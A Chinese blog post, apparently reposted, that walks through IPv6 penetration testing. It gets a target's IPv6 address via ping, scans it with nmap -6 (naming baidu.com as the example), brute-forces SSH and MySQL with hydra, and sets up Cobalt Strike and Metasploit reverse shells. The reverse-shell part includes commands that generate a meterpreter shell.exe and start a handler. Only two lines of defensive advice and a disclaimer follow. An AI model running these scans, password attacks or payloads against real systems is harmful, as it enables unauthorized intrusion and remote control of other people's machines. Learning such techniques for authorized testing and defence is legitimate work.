文章总结: 文章演示通过ping域名获取IPv6地址后,用nmap-6扫描端口、hydra爆破SSH与MySQL弱口令,并利用CS与MSF配置IPv6监听实现跨网段上线,指出域名解析与弱口令是主要入口,建议关闭公网敏感端口并强化密码。 综合评分: 72 文章分类: 渗透测试,红队,内网渗透,安全工具,漏洞分析
“肾透”中针对IPV6的攻击和防范
原创
大表哥吆
kali笔记
2026年1月5日 22:50 甘肃
随着IPv6网络的普及。极大地方便了我们的工作。但同时也带来了相对隐藏的安全隐患。因此,本文从攻击者的角度演示IPv6在渗透测试中的利用,和如何防范相应的安全措施。
信息收集及利用
如何获取IPv6地址?相对IPv4、ipv6更长、更不容易记忆,且随时发生变化。因此很多人觉得自己很“安全”。
为了方便自己,我们常将ipv6地址解析到域名。而这也为安全埋下了隐患。
因此,我们可以通过ping域名的形式获取对方的IP地址。如下:
利用ping可以获取ipv6地址
端口扫描
同样,我们可以利用nmap命令对目标进行端口扫描。
nmap -6 -T4 -A baidu.com
其中-6 指明该目标为ipv6目标。
如上,我们扫描得到,系统类型为Debian。分别开启常见的22``80``3306等端口。有些大佬在本地环境中部署程序时,为了方便自己喜欢用弱口令,而这也对攻击者有了可乘之机!
利用弱口令登录qbittorrent下载器
对设备密码破解
可以尝试对主机的22``3306端口进行暴力破解。示例如下:
hydra -L user.txt -P pass.txt -t 10 -o save.log -vV #ipv6地址# ssh
IPV6上线Shell
我们在上线Payload时,常常苦于没有公网IP而无法实现跨网段上线设备。而IPV6为我们打开了新的思路。
CS配置
新建监听IPV6地址
生成payload
上线设备
msf配置
很简单,将原来的ipv4地址改成ipv6就行了。
msfconsole
use payload/windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
# 生成shell
generate -f exe -o shell.exe
配置监听
use exploits/multi/handler
set payload windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
exploit
安全建议
- 非必要,请勿将敏感端口暴露在公网环境。
- 强化密码,定期更新漏洞。
更多精彩文章 欢迎关注我们
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:kali笔记 大表哥吆《“肾透”中针对IPV6的攻击和防范》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论